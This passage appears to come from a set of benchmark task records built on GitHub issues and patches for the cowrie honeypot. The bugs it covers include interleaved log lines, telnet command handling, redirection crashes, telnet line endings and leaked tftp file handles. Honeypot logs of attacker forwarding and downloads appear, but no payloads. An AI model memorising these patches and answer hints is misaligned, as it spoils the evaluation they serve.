\x00\xa7\x00m\x00:\x00\x89\xc02\xc0.\xc0_\xc0&\xc0\x0f\xc0\x05\x00\x9d\x00=\x005\x00\x84\xc0\x12\xc0\x08\xc0\x1c\xc0\x1b\x00\x16\x00\x13\xc0\x17\xc0\x1a\x00\x1b\xc0\r\xc0\x03\x00\n\xc0/\xc0+\xc0\'\xc0#\xc0\x13\xc0\t\xc0\x1f\xc0\x1e\x00\xa2\x00\x9e\x00g\x00@\x003\x002\x00\x9a\x00\x99\x00E\x00D\xc0\x18\xc0\x1d\x00\xa6\x00l\x004\x00\x9b\x00F\xc01\xc0-\xc0)\xc0%\xc0\x0e\xc0\x04\x00\x9c\x00<\x00/\x00\x96\x00A\x00\x07\xc0\x11\xc0\x07\xc0\x16\x00\x18\xc0\x0c\xc0\x02\x00\x05\x00\x04\x00\x15\x00\x12\x00\x1a\x00\t\x00\x14\x00\x11\x00\x19\x00\x08\x00\x06\x00\x17\x00\x03\x00\xff\x01\x00\x00\x81\x00\x00\x00\x12\x00\x10\x00\x00\rwww.google.se\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x004\x002\x00\x0e\x00\r\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\t\x00\n\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00\r\x00\"\x00 \x06\x01\x06\x02\x06\x03\x05\x01\x05\x02\x05\x03\x04\x01\x04\x02\x04\x03\x03\x01\x03\x02\x03\x03\x02\x01\x02\x02\x02\x03\x01\x01\x00\x0f\x00\x01\x01'", "message": "direct-tcp forward to 173.194.222.94:443 with data '\x16\x03\x01\x01x\x01\x00\x01t\x03\x03W\xbfKf\x82v^\x9e\x7f\x15\t\x08+o\x13(9\x05\xcd4\"\xebk}\xcb\xa00|\xce\x9e\x1do\x00\x00\xca\xc00\xc0,\xc0(\xc0$\xc0\x14\xc0\n\xc0\"\xc0!\x00\xa3\x00\x9f\x00k\x00j\x009\x008\x00\x88\x00\x87\xc0\x19\xc0 \x00\xa7\x00m\x00:\x00\x89\xc02\xc0.\xc0_\xc0&\xc0\x0f\xc0\x05\x00\x9d\x00=\x005\x00\x84\xc0\x12\xc0\x08\xc0\x1c\xc0\x1b\x00\x16\x00\x13\xc0\x17\xc0\x1a\x00\x1b\xc0\r\xc0\x03\x00\n\xc0/\xc0+\xc0\'\xc0#\xc0\x13\xc0\t\xc0\x1f\xc0\x1e\x00\xa2\x00\x9e\x00g\x00@\x003\x002\x00\x9a\x00\x99\x00E\x00D\xc0\x18\xc0\x1d\x00\xa6\x00l\x004\x00\x9b\x00F\xc01\xc0-\xc0)\xc0%\xc0\x0e\xc0\x04\x00\x9c\x00<\x00/\x00\x96\x00A\x00\x07\xc0\x11\xc0\x07\xc0\x16\x00\x18\xc0\x0c\xc0\x02\x00\x05\x00\x04\x00\x15\x00\x12\x00\x1a\x00\t\x00\x14\x00\x11\x00\x19\x00\x08\x00\x06\x00\x17\x00\x03\x00\xff\x01\x00\x00\x81\x00\x00\x00\x12\x00\x10\x00\x00\rwww.google.se\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x004\x002\x00\x0e\x00\r\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\t\x00\n\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00\r{"eventid": "cowrie.direct-tcpip.data", "timestamp": "2016-08-25T19:45:14.966466Z", "sensor": "redacted", "system": "SSHChannel None (13) on SSHService ssh-connection on HoneyPotSSHTransport,65,193.169.53.1{"eventid": "cowrie.direct-tcpip.request", "timestamp": "2016-08-25T19:45:24.508664Z", "session": "a0c671d3", "src_port": 5556, "message": "direct-tcp connection request to 98.138.112.32:25 from localhost:5556", "system": "SSHService ssh-connection on HoneyPotSSHTransport,62,193.169.52.222", "isError": 0, "src_ip": "redacted", "dst_port": 25, "dst_ip": "redacted", "sensor": 
"redacted"} If you look carefully, there is the second log message inserted right into the first ( "\x11\x00\r{"eventid":" ) and the third is inserted into the second one: " 65,193.169.53.1{"eventid": " The only suspicious thing in logs is presence of tracebacks that repeat pretty often: 2016-08-25T22:29:08+0300 [SSHChannel None (2) on SSHService ssh-connection on HoneyPotSSHTransport,65,censored] sending close 2 2016-08-25T22:29:24+0300 [twisted.internet.defer#critical] Unhandled error in Deferred: Traceback (most recent call last): Failure: twisted.internet.error.ConnectionDone: Connection was closed cleanly. ... 2016-08-25T22:28:52+0300 [StripCrTelnetTransport,221,censored] Warning: state changed and new state returned 2016-08-25T22:29:01+0300 [twisted.internet.defer#critical] Unhandled error in Deferred: Traceback (most recent call last): Failure: twisted.conch.telnet.OptionRefused: twisted.conch.telnet.OptionRefused:'\x03' Any ideas?
Interesting. Seems at high logging volume it will need some queuing system... I've run into the same issue. I'm currently testing the queue approach @micheloosterhof mentioned, so PR coming soon.
2016-10-09T22:05:58
cowrie/cowrie
392
cowrie__cowrie-392
[ "385" ]
24c251b405c54911dbb69d8d29d1719cb6cb380d
diff --git a/cowrie/telnet/transport.py b/cowrie/telnet/transport.py --- a/cowrie/telnet/transport.py +++ b/cowrie/telnet/transport.py @@ -138,6 +138,10 @@ def login(ignored): return 'Discard' + def telnet_Command(self, command): + self.transport.protocol.dataReceived(command+'\r') + return "Command" + def _cbLogin(self, ial): """ Fired on a successful login
HoneyPotTelnetAuthProtocol instance has no attribute 'telnet_Command' Environment: Python 2.7.12, twistd 16.0.0 Log: > 2016-12-21 13:30:48-0800 [cowrie.telnet.transport.HoneyPotTelnetFactory] New connection: xx.xxx.x.xxx:xxxxx (xxx.xx.x.x:2223) [session: TT130] 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] login attempt [/888888] failed 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] Warning: state changed and new state returned 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] login attempt [888888/shell] succeeded 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] Opening TTY Log: /opt/share/events/tty/20161221-133048-None-130i.log 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] Warning: state changed and new state returned 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] Unhandled Error Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 101, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext return func(*args,**kw) --- <exception caught here> --- File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 597, in _doReadOrWrite why = selectable.doRead() File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 209, in doRead return self._dataReceived(data) File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in _dataReceived rval = self.protocol.dataReceived(data) File "/usr/lib/python2.7/dist-packages/twisted/conch/telnet.py", line 589, in dataReceived self.applicationDataReceived(''.join(appDataBuffer)) File "/usr/lib/python2.7/dist-packages/twisted/conch/telnet.py", line 898, in applicationDataReceived self.protocol.dataReceived(bytes) File "/usr/lib/python2.7/dist-packages/twisted/protocols/basic.py", line 571, in dataReceived why = self.lineReceived(line) File "/usr/lib/python2.7/dist-packages/twisted/conch/telnet.py", line 1000, in lineReceived newState = getattr(self, "telnet_" + oldState)(line) exceptions.AttributeError: HoneyPotTelnetAuthProtocol instance has no attribute 'telnet_Command' 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] Closing TTY Log: /opt/share/events/tty/20161221-133048-None-130i.log after 0 seconds 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] honeypot terminal protocol connection lost [Failure instance: Traceback (failure with no frames): <type 'excepti ons.AttributeError'>: HoneyPotTelnetAuthProtocol instance has no attribute 'telnet_Command' ] 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] Connection lost after 0 seconds
Can you tell me how to reproduce this? I'm not sure how to reproduce it yet. The above log was copied from a cowrie instance which was exposed to the Internet. The instance got over 7k errors of this type during the last 10 days. I was able to reproduce this. It appears to be due to having more than just the username and password in the data buffer when authenticating. This can happen if a client tries to send the username, password, and commands all at the same time without waiting for the login to complete. The following command will cause the exception: ```(printf 'root\npass\npwd\n' && cat) | telnet 127.0.0.1 2223``` Changing `self.state = 'Command'` to `self.state = 'Discard'` in `_cbLogin()` will cause the exception to go away, but any commands in the buffer will be lost. This appears to be a long-standing issue in Twisted's AuthenticatingTelnetProtocol. The old, deprecated twisted.protocols.telnet module used telnet_Command for running commands, and the new implementation in twisted.conch still sets self.state to "Command." This appears to have been intended to be used to handle command input, but that is not documented anywhere. To fix this correctly, we would need to implement telnet_Command in HoneyPotTelnetAuthProtocol to forward the input to the user's session. The following function appears to work correctly for me. ``` def telnet_Command(self, command): self.transport.protocol.dataReceived(command+'\r') return "Command" ```
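A toy illustration of the dispatch convention behind the traceback: Twisted routes each received line to a method named `telnet_<state>`, so entering the "Command" state without defining `telnet_Command` raises AttributeError. `ToyProtocol` is obviously not the real Twisted class:

```python
class ToyProtocol:
    state = "User"

    def lineReceived(self, line):
        # Mirrors twisted.conch.telnet: getattr(self, "telnet_" + state)(line)
        self.state = getattr(self, "telnet_" + self.state)(line)

    def telnet_User(self, line):
        return "Command"  # the next line now needs a telnet_Command method

p = ToyProtocol()
p.lineReceived("root")
try:
    p.lineReceived("pwd")
except AttributeError as exc:
    print(exc)  # 'ToyProtocol' object has no attribute 'telnet_Command'
```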
2017-01-04T14:08:50
cowrie/cowrie
397
cowrie__cowrie-397
[ "396" ]
0254a78d53d6c6f8b1539e953e945dc491653597
diff --git a/cowrie/core/honeypot.py b/cowrie/core/honeypot.py --- a/cowrie/core/honeypot.py +++ b/cowrie/core/honeypot.py @@ -45,9 +45,18 @@ def __init__(self, protocol, *args): self.protocol.terminal.transport.session.id, re.sub('[^A-Za-z0-9]', '_', self.outfile)) perm = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH - self.fs.mkfile(self.outfile, 0, 0, 0, stat.S_IFREG | perm) - with open(self.safeoutfile, 'a'): - self.fs.update_realfile(self.fs.getfile(self.outfile), self.safeoutfile) + try: + self.fs.mkfile(self.outfile, 0, 0, 0, stat.S_IFREG | perm) + except fs.FileNotFound: + # The outfile locates at a non-existing directory. + self.protocol.pp.outReceived('-bash: %s: No such file or directory\n' % self.outfile) + self.write = self.write_to_failed + self.outfile = None + self.safeoutfile = None + + else: + with open(self.safeoutfile, 'a'): + self.fs.update_realfile(self.fs.getfile(self.outfile), self.safeoutfile) def check_arguments(self, application, args): @@ -78,10 +87,16 @@ def write_to_file(self, data): self.fs.update_size(self.outfile, self.writtenBytes) + def write_to_failed(self, data): + """ + """ + pass + def start(self): """ """ - self.call() + if self.write != self.write_to_failed: + self.call() self.exit()
Session abort when command was redirected to a file located at a non-existent directory To reproduce the problem, execute this command: `echo "test" > /path/not/exists/file` For a telnet login, the session will abort immediately. For an SSH login, the command execution will hang there. After hitting enter, the CLI resumes. However, an `exit` command will still cause the session to terminate abnormally. The problem is, in `cowrie/core/protocol.py` line 48, after noticing that the command has redirection, cowrie will create the file via `fs.mkfile()`. The `mkfile()` invokes `fs.get_path()`. Since the directory doesn't exist, `get_path` raises an `fs.FileNotFound` exception which is not caught properly.
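A small sketch of the fallback technique the patch uses: when the redirect target cannot be created, the instance's `write` method is swapped for a no-op so later output is silently discarded instead of crashing the session. The class and method names below are shortened stand-ins for the real ones in honeypot.py:

```python
class RedirectingCommand:
    def write(self, data):
        print("writing:", data)

    def write_to_failed(self, data):
        pass  # silently discard output once the redirect has failed

    def open_output(self, directory_exists: bool):
        if not directory_exists:
            # Per-instance method swap: only this command goes quiet.
            self.write = self.write_to_failed

cmd = RedirectingCommand()
cmd.open_output(directory_exists=False)
cmd.write("ignored")  # no output, no exception
```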
2017-01-05T00:44:10
cowrie/cowrie
415
cowrie__cowrie-415
[ "414" ]
8c3286276aded15d9795f104ea963b9b587421d8
diff --git a/cowrie/telnet/transport.py b/cowrie/telnet/transport.py --- a/cowrie/telnet/transport.py +++ b/cowrie/telnet/transport.py @@ -180,15 +180,17 @@ def enableLocal(self, opt): if opt == ECHO: return True elif opt == SGA: - return True + return False + #return True else: return False def enableRemote(self, opt): if opt == LINEMODE: - self.transport.requestNegotiation(LINEMODE, MODE + chr(TRAPSIG)) - return True + return False + #self.transport.requestNegotiation(LINEMODE, MODE + chr(TRAPSIG)) + #return True elif opt == NAWS: return True elif opt == SGA:
^M for carriage return in telnet Trying to log in via telnet to cowrie results in the following: $telnet xx.yy.zz.aa Trying xx.yy.zz.aa Connected to xx.yy.zz.aa. Escape character is '^]'. login: icantpressenter^M^M^M^M^M^M^M^M^M^M^M^] telnet> q Connection closed. It looks like some kind of control character thing. Telnet on Windows "kind of works", and telnet on OS X and Linux (Debian 8.6) produces the above ^M issue. Oddly, specifying the destination port in the telnet client (e.g. "telnet host 23") removes this issue, probably because control messages aren't sent.
I have seen the behavior too, though in my case Cowrie was running in a Docker container and connecting from outside the container produced the above ^M when pressing enter, but connecting from inside the container behaved correctly. When connecting from outside I was not specifying a port to the Telnet client, but when inside the container I did because Cowrie was listening on port 2223. I have just verified that I see the same behavior as you when connecting to that system with and without specifying a port. This issue has to do with the way the Telnet client negotiates the echo, linemode, and suppress go ahead (SGA) options and the character the client sends when pressing enter. When those three options are negotiated correctly, the client switches to character mode and sends a carriage return when enter is pressed. If it is still in linemode, the client sends a newline character instead. I do not know why the Telnet client behaves differently when a port is specified, but it is possible to get better behavior by refusing to enable SGA and linemode when authenticating. I will submit a pull request with that change shortly.
2017-01-20T20:37:23
cowrie/cowrie
439
cowrie__cowrie-439
[ "367" ]
e2033c36f3ba94b4e493d9d1718c0279eba378c0
diff --git a/cowrie/commands/tftp.py b/cowrie/commands/tftp.py --- a/cowrie/commands/tftp.py +++ b/cowrie/commands/tftp.py @@ -48,7 +48,6 @@ def makeTftpRetrieval(self): """ """ progresshook = Progress(self).progresshook - tclient = tftpy.TftpClient(self.hostname, int(self.port)) cfg = self.protocol.cfg if cfg.has_option('honeypot', 'download_limit_size'): @@ -63,51 +62,52 @@ def makeTftpRetrieval(self): re.sub('[^A-Za-z0-9]', '_', self.file_to_get)) self.safeoutfile = os.path.join(self.download_path, tmp_fname) - try: - tclient.download(self.file_to_get, self.safeoutfile, progresshook) - self.file_to_get = self.fs.resolve_path(self.file_to_get, self.protocol.cwd) - self.fs.mkfile(self.file_to_get, 0, 0, tclient.context.metrics.bytes, 33188) - self.fs.update_realfile(self.fs.getfile(self.file_to_get), self.safeoutfile) - - if os.path.exists(self.safeoutfile): - - if os.path.getsize(self.safeoutfile) == 0: - os.remove(self.safeoutfile) - self.safeoutfile = None - return - - with open(self.safeoutfile, 'rb') as f: - shasum = hashlib.sha256(f.read()).hexdigest() - hash_path = os.path.join(self.download_path, shasum) - - # If we have content already, delete temp file - if not os.path.exists(hash_path): - os.rename(self.safeoutfile, hash_path) - else: - os.remove(self.safeoutfile) - log.msg("Not storing duplicate content " + shasum) - - log.msg(eventid='cowrie.session.file_download', - format='Downloaded tftpFile (%(url)s) with SHA-256 %(shasum)s to %(outfile)s', - url=self.file_to_get, - outfile=hash_path, - shasum=shasum) - - # Link friendly name to hash - os.symlink(shasum, self.safeoutfile) - - # Update the honeyfs to point to downloaded file - f = self.fs.getfile(self.file_to_get) - f[A_REALFILE] = hash_path - - except tftpy.TftpException, err: - if os.path.exists(self.safeoutfile): - if os.path.getsize(self.safeoutfile) == 0: - os.remove(self.safeoutfile) - return + with tftpy.TftpClient(self.hostname, int(self.port)) as tclient: + try: + tclient.download(self.file_to_get, self.safeoutfile, progresshook) + self.file_to_get = self.fs.resolve_path(self.file_to_get, self.protocol.cwd) + if hasattr(tclient.context, 'metrics'): + self.fs.mkfile(self.file_to_get, 0, 0, tclient.context.metrics.bytes, 33188) + else: + self.fs.mkfile(self.file_to_get, 0, 0, 0, 33188) + self.fs.update_realfile(self.fs.getfile(self.file_to_get), self.safeoutfile) + except tftpy.TftpException, err: + pass + + if os.path.exists(self.safeoutfile): + + if os.path.getsize(self.safeoutfile) == 0: + os.remove(self.safeoutfile) + self.safeoutfile = None + return + + with open(self.safeoutfile, 'rb') as f: + shasum = hashlib.sha256(f.read()).hexdigest() + hash_path = os.path.join(self.download_path, shasum) + + # If we have content already, delete temp file + if not os.path.exists(hash_path): + os.rename(self.safeoutfile, hash_path) + else: + os.remove(self.safeoutfile) + log.msg("Not storing duplicate content " + shasum) + + url = 'tftp://%s/%s' % (self.hostname, self.file_to_get.strip('/')) + + log.msg(eventid='cowrie.session.file_download', + format='Downloaded tftpFile (%(url)s) with SHA-256 %(shasum)s to %(outfile)s', + url=url, + outfile=hash_path, + shasum=shasum) + + # Link friendly name to hash + os.symlink(shasum, self.safeoutfile) + + # Update the honeyfs to point to downloaded file + f = self.fs.getfile(self.file_to_get) + f[A_REALFILE] = hash_path + - except KeyboardInterrupt: - pass def start(self):
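The patch above wraps the TFTP client usage and funnels every download through a hash-dedup store. A generic sketch of that storage scheme, with illustrative paths and names rather than cowrie's real API:

```python
import hashlib
import os

def store_download(download_dir: str, tmp_path: str) -> str:
    # Store each artifact once under its SHA-256 and keep the friendly name
    # as a symlink; duplicate downloads then cost no extra disk space.
    with open(tmp_path, "rb") as f:
        shasum = hashlib.sha256(f.read()).hexdigest()
    hash_path = os.path.join(download_dir, shasum)
    if not os.path.exists(hash_path):
        os.rename(tmp_path, hash_path)   # first copy of this content
    else:
        os.remove(tmp_path)              # duplicate content, keep one copy
    os.symlink(shasum, tmp_path)         # friendly name -> hash
    return hash_path
```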
Could not accept new connection (EMFILE)

Today, I've seen the following messages on my honeypots:

```
2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE)
2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE)
2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE)
2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE)
2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE)
2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE)
2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE)
2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE)
2016-12-01 09:02:14+0300 [cowrie.telnet.transport.HoneyPotTelnetFactory] Could not accept new connection (EMFILE)
```

I'm not 100% sure that it was caused by original cowrie, since I have some patches in place. So, first of all, I'd appreciate it if you guys check your instances and tell me if you ever experienced such errors. Different honeypots got this error with both Telnet and SSH. One honeypot even has a traceback (the paste below is reproduced as reported, including its mangled, repeating frames):

```
2016-12-01 08:41:36+0300 [-] Unhandled error in Deferred:
2016-12-01 08:41:36+0300 [-] Unhandled Error
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/site-packages/twisted/internet/base.py", line 1079, in connectionFailed
    self.factory.clientConnectionFailed(self, reason)
  File "/usr/local/lib/python2.7/site-packages/twisted/web/client.py", line 457, in clientConnectionFailed
    self.deferred.errback(reason)
  File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 434, in errback
    self._startRunCallbacks(fail)
  File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 501, in _startRunCallbacks
    self._runCallbacks()
  --- <exception caught here> ---
  File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 588, in _runCallbacks
    current.result = callback(current.result, *args, **kw)
  File "/home/cowrie/cowrie/cowrie/commands/wget.py", line 233, in error
    self.exit()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit
    self.protocol.cmdstack[-1].resume()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 338, in resume
    self.runCommand()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 330, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 335, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 192, in call_command
    obj.start()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 94, in start
    self.exit()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit
    self.protocol.cmdstack[-1].resume()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 338, in resume
    self.runCommand()
    self.factory.clientConnectionFailed(self, reason)
  File "/usr/local/lib/python2.7/site-packages/twisted/web/client.py", line 457, in clientConnectionFailed
    self.deferred.errback(reason)
  File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 434, in errback
    self._startRunCallbacks(fail)
  File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 501, in _startRunCallbacks
    self._runCallbacks()
  --- <exception caught here> ---
  File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 588, in _runCallbacks
    current.result = callback(current.result, *args, **kw)
  File "/home/cowrie/cowrie/cowrie/commands/wget.py", line 233, in error
    self.exit()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit
    self.protocol.cmdstack[-1].resume()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 338, in resume
    self.runCommand()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 330, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 335, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 192, in call_command
    obj.start()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 94, in start
    self.exit()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit
    self.protocol.cmdstack[-1].resume()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 338, in resume
    self.runCommand()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 330, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 335, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 192, in call_command
    obj.start()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 94, in start
    self.exit()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit
    self.protocol.cmdstack[-1].resume()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 338, in resume
    self.runCommand()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 330, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 335, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 192, in call_command
    obj.start()
  File "/home/cowrie/cowrie/cowrie/commands/tftp.py", line 146, in start
    self.exit()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit
    self.protocol.cmdstack[-1].resume()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 337, in resume
    self.protocol.setInsertMode()
  File "/usr/local/lib/python2.7/site-packages/twisted/conch/recvline.py", line 173, in setInsertMode
    self.terminal.setModes([insults.modes.IRM])
  File "/usr/local/lib/python2.7/site-packages/twisted/conch/insults/insults.py", line 628, in setModes
    self.write('\x1b[%sh' % (';'.join(map(str, modes)),))
  File "/home/cowrie/cowrie/cowrie/insults/insults.py", line 92, in write
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 335, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 192, in call_command
    obj.start()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 94, in start
    self.exit()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit
    self.protocol.cmdstack[-1].resume()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 338, in resume
    self.runCommand()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 330, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 335, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/cowrie/core/protocol.py", line 192, in call_command
    obj.start()
  File "/home/cowrie/cowrie/cowrie/commands/tftp.py", line 146, in start
    self.exit()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 109, in exit
    self.protocol.cmdstack[-1].resume()
  File "/home/cowrie/cowrie/cowrie/core/honeypot.py", line 337, in resume
    self.protocol.setInsertMode()
  File "/usr/local/lib/python2.7/site-packages/twisted/conch/recvline.py", line 173, in setInsertMode
    self.terminal.setModes([insults.modes.IRM])
  File "/usr/local/lib/python2.7/site-packages/twisted/conch/insults/insults.py", line 628, in setModes
    self.write('\x1b[%sh' % (';'.join(map(str, modes)),))
  File "/home/cowrie/cowrie/cowrie/insults/insults.py", line 92, in write
    ttylog.TYPE_OUTPUT, time.time(), bytes)
  File "/home/cowrie/cowrie/cowrie/core/ttylog.py", line 39, in ttylog_write
    with open(logfile, 'ab') as f:
exceptions.IOError: [Errno 24] Too many open files: 'log/tty/20161201-074642-None-3340i.log'
```
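Not part of the original report: when chasing EMFILE errors like the one above, a quick way to compare a process's descriptor usage against its limit from inside Python is the stdlib `resource` module. A minimal sketch, assuming a Linux `/proc` layout:

```python
import os
import resource

# Soft/hard limits on open file descriptors for this process
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)

# Count descriptors currently open (Linux-specific /proc layout)
open_fds = len(os.listdir('/proc/self/fd'))

print("open fds: %d / soft limit: %d (hard: %d)" % (open_fds, soft, hard))
```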
Could be that the server is running out of file descriptors. The "exceptions.IOError: [Errno 24] Too many open files: 'log/tty/20161201-074642-None-3340i.log'" provides another hint that it was unable to write a new file. Increasing the server's maximum number of file descriptors might temporarily solve this problem.

In my own cowrie instance, I sometimes noticed that connections (about 2000 of them) tied to the cowrie process were left hanging in CLOSE_WAIT status for a long time. I had to restart the cowrie process to get rid of them.

I've just checked the open descriptors, and it looks like cowrie doesn't drop connections under some circumstances, because some descriptors (about 50% of all descriptors) have been open for more than a day now:

```
lrwx------ 1 cowrie cowrie 64 Dec 4 11:39 91 -> socket:[1259944917]
l-wx------ 1 cowrie cowrie 64 Dec 4 11:39 92 -> /home/cowrie/cowrie/dl/20161202224203_tftp1_sh
lrwx------ 1 cowrie cowrie 64 Dec 4 11:39 93 -> socket:[1247497450]
l-wx------ 1 cowrie cowrie 64 Dec 4 11:39 94 -> /home/cowrie/cowrie/dl/20161202205345_tftp1_sh
lrwx------ 1 cowrie cowrie 64 Dec 4 11:39 95 -> socket:[1247501472]
l-wx------ 1 cowrie cowrie 64 Dec 4 11:39 96 -> /home/cowrie/cowrie/dl/20161202205410_tftp2_sh
lrwx------ 1 cowrie cowrie 64 Dec 4 11:39 97 -> socket:[1248238996]
l-wx------ 1 cowrie cowrie 64 Dec 4 11:39 98 -> /home/cowrie/cowrie/dl/20161202224228_tftp2_sh
```

> I had to restart the cowrie process to get rid of them.

Probably, it would be nice to schedule a daily restart to prevent such things.

There is a timeout for each session, and if sessions are hanging, the session timeout should be fixed first. Also, it appears that the downloaded files (_sh files) stay open. Those should have been closed.

I've reproduced the issue. 2-3 days of uptime is enough to get this error on almost all of my honeypots. I can confirm that the problem is related only to tftp-downloaded files. Probably, the client doesn't close the file handle for some reason. I'll try to track down the problem...

Also, I have a couple of hung (?) connections. While stopping the process, cowrie logged the following:

```
2016-12-07 07:56:00+0300 [HoneyPotSSHTransport,505,attackers_ip] avatar admin logging out
2016-12-07 07:56:00+0300 [HoneyPotSSHTransport,505,attackers_ip] connection lost
2016-12-07 07:56:00+0300 [HoneyPotSSHTransport,505,attackers_ip] Connection lost after 66706 seconds
2016-12-07 07:56:01+0300 [HoneyPotSSHTransport,144,attackers_ip] avatar admin logging out
2016-12-07 07:56:01+0300 [HoneyPotSSHTransport,144,attackers_ip] connection lost
2016-12-07 07:56:01+0300 [HoneyPotSSHTransport,144,attackers_ip] Connection lost after 126256 seconds
2016-12-07 07:56:01+0300 [HoneyPotSSHTransport,504,attackers_ip] avatar admin logging out
2016-12-07 07:56:01+0300 [HoneyPotSSHTransport,504,attackers_ip] connection lost
